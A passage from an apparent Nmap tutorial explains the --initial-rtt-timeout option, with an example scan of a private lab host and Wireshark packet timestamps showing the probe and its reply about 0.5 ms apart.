packet 2: SYN/ACK packet from port 22 at 08:15:08.173117154 from 192.168.1.139 to 192.168.1.126


Initial round trip timeout

--initial-rtt-timeout is the timeout Nmap starts with before it has measured any round-trip time. After that the timeout adapts to the replies it observes, staying within the range set by --min-rtt-timeout and --max-rtt-timeout, so the actual wait can end up shorter or longer than the initial value:
nmap -p21-25 192.168.1.139 --initial-rtt-timeout 15ms


Wireshark shows the reply arriving about 0.5 ms after the probe, well inside the 15 ms initial timeout:

packet 1: TCP SYN packet to port 23 at 08:18:45.342395520 from 192.168.1.126 to 192.168.1.139


packet 2: SYN/ACK packet from port 23 at 08:18:45.342930962 from 192.168.1.139 to 192.168.1.126